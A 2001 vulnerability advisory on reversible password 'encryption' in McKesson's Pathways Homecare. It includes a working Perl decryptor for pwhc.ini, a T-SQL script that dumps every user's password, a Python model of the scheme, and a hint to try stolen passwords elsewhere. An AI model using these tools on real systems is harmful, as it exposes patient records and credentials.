
Pathways Homecare weak encryption
10th Dec 2001 [SBWID-4913]
COMMAND

	Pathways Homecare weak encryption

SYSTEMS AFFECTED

	Pathways Homecare 6.5

PROBLEM

	shoeboy posted:
	

	Users with access to certain config files can retrieve 'sa' or equivalent
	account password for SQL Server 7.0 (MSDE) as well as retrieve application
	passwords for all users of the application.
	

	The full scoop:
	

	According to the vendor, McKesson's Pathways Homecare is the first
	comprehensive client/server application introduced to the homecare market
	for advanced information management.
	

	Basically it stores patient information, billing information and medical
	records for people who receive health care in their homes. Each clinician
	has a laptop and all the laptops are periodically synced with a central
	database. Additionally there is a desktop client for administrative staff.
	Both the laptops and the central database server run Microsoft SQL Server
	7.0.
	

	Workstation and laptop users alike get their connection information from a
	file named pwhc.ini which contains an encrypted username and password. For
	workstations, the file is stored on a central fileserver and the account is
	likely to have dbo level permissions on the central database. For the
	laptops, this file is stored locally and the account used is either 'sa' on
	the local version of SQL or has equivalent permissions.
	

	As you've probably guessed by now, the vendor (on the web at
	www.mckesson.com ) decided to be clever and roll their own encryption
	algorithm:
	

	First they determine whether the username/password is even or odd in
	length. If odd, they use the following sequence of numbers: 3,8,5,10,7...
	If even, the sequence is 7,4,9,6,11... Then they reverse the
	username/password and subtract the corresponding number in the sequence
	from each byte.
	

	That wasn't the best of explanations, so here's a bit of perl:
	 

	#! /usr/bin/perl -w
	################################################################################
	# pwhc_crack.pl -- Extracts a password from a Pathways Homecare PWHC.ini file
	################################################################################

	use strict;

	open (PWHC, "pwhc.ini") or die "Unable to open .ini file";
	while (<PWHC>) {
	   chomp;
	   if ($_ =~ /^UserID/) { print "UserID: ", decrypt($_), "\n"; }
	   if ($_ =~ /^Password/) { print "Password: ", decrypt($_), "\n"; }
	}
	close (PWHC);

	################################################################################
	# The sad thing is that this isn't the worst part of product.  It's not
	# that the vendor is using weak encryption, it's that the quality of
	# the encryption is better than most of their code.
	################################################################################

	sub decrypt {
	   my ($line) = @_;                  # a "UserID=..." or "Password=..." line
	   my $counter = 0;
	   my $key;
	   my @cryptstr = split /=/, $line, 2;
	   # Work on the reversed value as a list of byte values
	   my @revstr = unpack("c*", (scalar reverse $cryptstr[1]));
	   if (@revstr % 2) {
	      # Odd length: offsets run 3, 8, 5, 10, 7, ...
	      $key = 3;
	      while ($counter < @revstr) {
	         $revstr[$counter] += $key;
	         $counter++;
	         $key += ($counter % 2) ? 5 : -3;
	      }
	   }
	   else {
	      # Even length: offsets run 7, 4, 9, 6, 11, ...
	      $key = 7;
	      while ($counter < @revstr) {
	         $revstr[$counter] += $key;
	         $counter++;
	         $key += ($counter % 2) ? -3 : 5;
	      }
	   }
	   # Reverse back to the original byte order
	   return pack("c*", (reverse @revstr));
	}

	__END__

	

	

	So now anyone who can get access to the config files for Pathways Homecare
	can read and modify confidential patient information as well as enjoy sa
	privileges on laptop clients, but they still can't use McKesson's usability
	disaster of a VB client to access that data in a less inconvenient manner
	because it's protected by an additional level of password protection.
	

	Unfortunately the vendor uses the exact same encryption method with
	slightly different key sequences for this additional layer of security.
	It's possible to retrieve the username and password for every user in
	about 2 seconds. The T-SQL code to do this follows:
	 

	SET NOCOUNT ON
	DECLARE @evenkey varchar(15)
	DECLARE @oddkey varchar(15)
	DECLARE @key varchar(15)
	DECLARE @cryptstr varchar(15)
	DECLARE @position tinyint
	DECLARE @length tinyint
	DECLARE @usrID varchar(30)

	DECLARE pwd_cursor CURSOR FOR SELECT usrID, pwd FROM usr
	OPEN pwd_cursor
	FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
	-- Each key letter minus 'A' (65) is the offset for that position
	SET @evenkey = 'FDHFJHLJNLPNRP'
	SET @oddkey = 'CGEIGKIMKOMQOSQ'

	WHILE (@@FETCH_STATUS = 0)
	BEGIN
	   SET @position = 1
	   SET @length = datalength(@cryptstr)
	   IF ((@length % 2) = 1) SET @key = @oddkey
	   ELSE SET @key = @evenkey

	   -- Walk the stored value from its last character to its first,
	   -- adding the offset for each position
	   WHILE (@position <= @length)
	   BEGIN
	      SET @cryptstr = STUFF(@cryptstr, (@length - @position) + 1, 1,
	          CHAR((ASCII(SUBSTRING(@key, @position, 1)) - 65)
	          + ASCII(SUBSTRING(@cryptstr, (@length - @position) + 1, 1))))
	      SET @position = @position + 1
	   END
	   PRINT @usrID + ' : ' + @cryptstr
	   FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr
	END
	CLOSE pwd_cursor
	DEALLOCATE pwd_cursor
	GO

	

	Bang! Out come the passwords and it's time to see if the user uses the
	same password elsewhere.
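	As an added example (not code from the advisory or from McKesson), a Python model of the scheme that mirrors shoeboy's Perl decryptor and adds the inverse; the sample passwords are constructed. It shows the "encryption" is a fixed, keyless per-position offset with no diffusion, which is why anyone who can read the config file can undo it.

```python
# Added example (not from the advisory or the vendor): a Python model of the
# Pathways Homecare scheme, mirroring the advisory's Perl decryptor.
def key_sequence(length):
    """Offsets the advisory describes: odd lengths run 3,8,5,10,7,...
    (+5/-3 alternating), even lengths run 7,4,9,6,11,... (-3/+5)."""
    key = 3 if length % 2 else 7
    steps = (5, -3) if length % 2 else (-3, 5)
    seq = []
    for i in range(length):
        seq.append(key)
        key += steps[i % 2]
    return seq


def pwhc_decrypt(stored):
    """Mirror of the Perl: the i-th offset is added to the i-th byte counted
    from the END of the stored value, so byte j gets seq[len-1-j]."""
    seq = key_sequence(len(stored))
    return bytes((b + seq[len(stored) - 1 - j]) & 0xFF for j, b in enumerate(stored))


def pwhc_encrypt(plain):
    """Inverse of pwhc_decrypt: subtract the same offsets."""
    seq = key_sequence(len(plain))
    return bytes((b - seq[len(plain) - 1 - j]) & 0xFF for j, b in enumerate(plain))


def differing_positions(a, b):
    """Positions at which two equal-length byte strings differ."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


if __name__ == "__main__":
    # Constructed sample values, not taken from any real pwhc.ini
    for pw in (b"sa", b"s3cret!"):
        ct = pwhc_encrypt(pw)
        assert pwhc_decrypt(ct) == pw
        print(pw, "->", ct)
    # No secret key and no diffusion: changing one plaintext byte changes
    # exactly one stored byte, so stored values can be compared byte for
    # byte without undoing the scheme at all.
    print(differing_positions(pwhc_encrypt(b"secret1"), pwhc_encrypt(b"secret2")))
```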
	

SOLUTION

	Nothing yet
